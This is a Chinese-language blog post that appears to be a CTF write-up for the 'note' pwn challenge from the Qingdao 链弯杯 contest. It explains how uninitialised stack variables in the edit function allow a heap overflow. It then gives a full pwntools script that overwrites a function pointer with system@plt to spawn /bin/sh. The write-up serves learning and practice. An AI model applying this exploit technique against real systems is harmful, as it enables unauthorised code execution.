<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>青岛链弯杯--note | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="废话：第一次打线下赛，确实很慌，该想到的东西都忘了，果然还是得多加练习啊QWQ 基本逻辑菜单类小游戏：add，edit，show，delete，copy add：添加结点，此处能够了解结点的结构   edit函数对结点的content进行编辑，但是这里的v3，v4，v1都没有进行初始化或者置零，将是本题的关键。  show函数，展示结点的content以及title。这个print函数是写在bss">
<meta property="og:type" content="article">
<meta property="og:title" content="青岛链弯杯--note">
<meta property="og:url" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="废话：第一次打线下赛，确实很慌，该想到的东西都忘了，果然还是得多加练习啊QWQ 基本逻辑菜单类小游戏：add，edit，show，delete，copy add：添加结点，此处能够了解结点的结构   edit函数对结点的content进行编辑，但是这里的v3，v4，v1都没有进行初始化或者置零，将是本题的关键。  show函数，展示结点的content以及title。这个print函数是写在bss">
<meta property="og:image" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/add.png">
<meta property="og:image" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/node.png">
<meta property="og:image" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/edit.png">
<meta property="og:image" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/show.png">
<meta property="og:image" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/copy.png">
<meta property="og:image" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/nodes.png">
<meta property="og:image" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/heap.png">
<meta property="og:updated_time" content="2018-06-27T12:55:41.572Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="青岛链弯杯--note">
<meta name="twitter:description" content="废话：第一次打线下赛，确实很慌，该想到的东西都忘了，果然还是得多加练习啊QWQ 基本逻辑菜单类小游戏：add，edit，show，delete，copy add：添加结点，此处能够了解结点的结构   edit函数对结点的content进行编辑，但是这里的v3，v4，v1都没有进行初始化或者置零，将是本题的关键。  show函数，展示结点的content以及title。这个print函数是写在bss">
<meta name="twitter:image" content="http://yoursite.com/2018/06/27/青岛链弯杯-note/add.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-青岛链弯杯-note" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/06/27/青岛链弯杯-note/" class="article-date">
  <time datetime="2018-06-27T12:02:46.000Z" itemprop="datePublished">2018-06-27</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      青岛链弯杯--note
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p><em>废话：第一次打线下赛，确实很慌，该想到的东西都忘了，果然还是得多加练习啊QWQ</em></p>
<h2 id="基本逻辑"><a href="#基本逻辑" class="headerlink" title="基本逻辑"></a>基本逻辑</h2><p>菜单类小游戏：add，edit，show，delete，copy</p>
<p>add：添加结点，此处能够了解结点的结构</p>
<p><img src="/2018/06/27/青岛链弯杯-note/add.png" alt="add函数"></p>
<p><img src="/2018/06/27/青岛链弯杯-note/node.png" alt="结点的结构"></p>
<p>edit函数对结点的content进行编辑，但是这里的v3，v4，v1都没有进行初始化或者置零，将是本题的关键。</p>
<p><img src="/2018/06/27/青岛链弯杯-note/edit.png" alt="edit函数"></p>
<p>show函数，展示结点的content以及title。<strong>这个print函数是写在bss段的一个地址，通过调试发现写入的就是puts函数地址。</strong></p>
<p><img src="/2018/06/27/青岛链弯杯-note/show.png" alt="show函数"></p>
<p>copy函数，malloc出某结点size大小的块N次，N为用户输入。</p>
<p><img src="/2018/06/27/青岛链弯杯-note/copy.png" alt="copy函数"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>所有结点的地址以数组元素的形式存在于bss段中的s1[]中。前面已经说到了，在edit函数里，对存放size，content地址和结点地址的变量v1，v4和v3都没有进行初始化。发现这个问题的契机在于，当第二次edit某个结点content时，随意输入title都会提示“plz input new content”。没有初始化的后果就是，由于这些函数都会共用一块栈空间，比如show中的v3和edit中的v3地址都是ebp-0x120，v4都是ebp-0x118，导致当在show之后，v3和v4的值为刚刚操作过的结点的地址和content地址，而进入到edit函数中后即使输入的title没有匹配，也会执行向v4中写入v1个字节的操作，如果v4和v1不是同一结点的两个参数，那么就会导致溢出。</p>
<p>例如：v1为s1[1]中的size，而v3和v4是s1[0]中的参数，edit就会向v4中写入v1个字节，当v1大于s1[0]的size时，会造成溢出。溢出后就可以修改s1[0]中content的地址，之后再edit时就相当于相被修改的地址中写入内容。这里先把content0地址修改为print的地址，edit时向print的位置写入system@plt，再次show的时候就相当于执行system。</p>
<p><img src="/2018/06/27/青岛链弯杯-note/nodes.png" alt="堆上结点和content组织形式"></p>
<h2 id="利用脚本"><a href="#利用脚本" class="headerlink" title="利用脚本"></a>利用脚本</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p=process(<span class="string">'./note'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(size,content,title)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'input choice:\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'input content size\n'</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.recvuntil(<span class="string">'input content\n'</span>)</span><br><span class="line">	p.sendline(content)</span><br><span class="line">	p.recvuntil(<span class="string">'input note title\n'</span>)</span><br><span class="line">	p.sendline(title)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(title,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'input choice:\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'plz input title\n'</span>)</span><br><span class="line">	p.sendline(title)</span><br><span class="line">	p.recvuntil(<span class="string">'plz input new content\n'</span>)</span><br><span class="line">	p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(title)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'input choice:\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'plz input title\n'</span>)</span><br><span class="line">	p.sendline(title)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">copy</span><span class="params">(title,num)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'input choice:\n'</span>)</span><br><span class="line">	p.sendline(<span class="string">'5'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'plz input title\n'</span>)</span><br><span class="line">	p.sendline(title)</span><br><span class="line">	p.recvuntil(<span class="string">'how many times do you want\n'</span>)</span><br><span class="line">	p.sendline(str(num))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'plz input your name\n'</span>)</span><br><span class="line">p.sendline(<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line">print_addr = <span class="number">0x602100</span></span><br><span class="line">sys_plt = <span class="number">0x400860</span></span><br><span class="line"><span class="comment">#0</span></span><br><span class="line">add(<span class="number">128</span>,<span class="string">"0gur0"</span>,<span class="string">"0"</span>)</span><br><span class="line"><span class="comment">#1</span></span><br><span class="line">add(<span class="number">256</span>,<span class="string">"0gur1"</span>,<span class="string">"1"</span>)</span><br><span class="line"><span class="comment">#2</span></span><br><span class="line">add(<span class="number">256</span>,<span class="string">"/bin/sh"</span>,<span class="string">"/bin/sh"</span>)</span><br><span class="line"><span class="comment">#edit 1 v1=256</span></span><br><span class="line">edit(<span class="string">"1"</span>,<span class="string">"new 0gur1"</span>)</span><br><span class="line"><span class="comment">#show 0 v3=s[0] v4=s[0].content</span></span><br><span class="line">show(<span class="string">"0"</span>)</span><br><span class="line"><span class="comment">#edit content0's addr</span></span><br><span class="line">payload =<span class="string">'a'</span>*<span class="number">128</span><span class="comment">#content0</span></span><br><span class="line">payload +=p64(<span class="number">0</span>)+p64(<span class="number">0x35</span>) <span class="comment">#node0 chunk header</span></span><br><span class="line">payload+=p64(<span class="number">48</span>)+p64(<span class="number">0</span>)+p64(<span class="number">128</span>)+p64(print_addr) <span class="comment">#node0</span></span><br><span class="line">edit(<span class="string">"hhh"</span>,payload)</span><br><span class="line"><span class="comment">#edit 0</span></span><br><span class="line">edit(<span class="string">"0"</span>,p64(sys_plt))</span><br><span class="line"></span><br><span class="line"><span class="comment">#show:print-&gt;system</span></span><br><span class="line">show(<span class="string">'/bin/sh'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>PS：一个还没有解决的问题，malloc按理说应该是在堆上进行分配的，但是本题查看分配的地址，都是以0x7f开头的，比较像栈上的地址，而且即使分配了多个块，top chunk的大小都不变…</p>
<p><img src="/2018/06/27/青岛链弯杯-note/heap.png" alt="分配的结点地址"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/06/27/青岛链弯杯-note/" data-id="cjix4iudh00082clu7b2wfi0v" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2018/06/05/suctf2018-note/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">suctf2018-note</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn-how2heap/">pwn;how2heap</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/pwn-how2heap/" style="font-size: 10px;">pwn;how2heap</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/06/">June 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/03/">March 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/02/">February 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/06/27/青岛链弯杯-note/">青岛链弯杯--note</a>
          </li>
        
          <li>
            <a href="/2018/06/05/suctf2018-note/">suctf2018-note</a>
          </li>
        
          <li>
            <a href="/2018/06/05/hitbctf2018-once/">hitbctf2018-once</a>
          </li>
        
          <li>
            <a href="/2018/06/05/fastbin-attack-search/">fastbin_attack-search</a>
          </li>
        
          <li>
            <a href="/2018/03/13/unsortedbin-attack-0ctf-zerostorage/">unsortedbin_attack--0ctf zerostorage</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2018 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>